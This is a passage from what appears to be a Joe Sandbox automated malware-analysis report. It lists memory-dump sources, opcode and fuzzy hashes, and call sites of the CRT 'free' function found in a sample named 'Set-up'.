                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free$calloc
                          • String ID:
                          • API String ID: 3095843317-0
                          • Opcode ID: 7104178c544444cb6b5db5c914e50168e397014c650c89fe9dbcb679c1ff6ffd
                          • Instruction ID: a487b1a29ff3f288d3cef3a0b7c32d3745ea3bdd41a051c800e4c3a2d1941abd
                          • Opcode Fuzzy Hash: 7104178c544444cb6b5db5c914e50168e397014c650c89fe9dbcb679c1ff6ffd
                          • Instruction Fuzzy Hash: 5D31FBB4604B059BC710EF29C4C052BB7F4FF98354F008A2EEA988B741E778E851CB56
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4266
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A427A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4285
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4290
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 576de34ad3f0cd4010f9a33ff8015a76801daffa00e319971dcaa6ee20d36447
                          • Instruction ID: 48274afd2983b97900f06e80b7aaaa1fe628eb77eb4c03d2d1bc2908cf18b8cc
                          • Opcode Fuzzy Hash: 576de34ad3f0cd4010f9a33ff8015a76801daffa00e319971dcaa6ee20d36447
                          • Instruction Fuzzy Hash: 4401D676E01100CFEB229F58E841E07B7D5EFD2324F0A8439E4458F262D730EC408B81
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0037D8A5,?), ref: 0039281B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00392826
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00392831
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0039283A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 77ce2adbc4299be17c273089f148384b0b0020b72f6ded4a95e3a2d7d206fd9c
                          • Instruction ID: c223d7afa9d88ed56e8f6d9de07fde64a32b44ab3da46667ca29d19f46a474e4
                          • Opcode Fuzzy Hash: 77ce2adbc4299be17c273089f148384b0b0020b72f6ded4a95e3a2d7d206fd9c
                          • Instruction Fuzzy Hash: DED062B6C0651097F5133B10BC0244B76959E6173CF094634F84565166EA12AD6555C3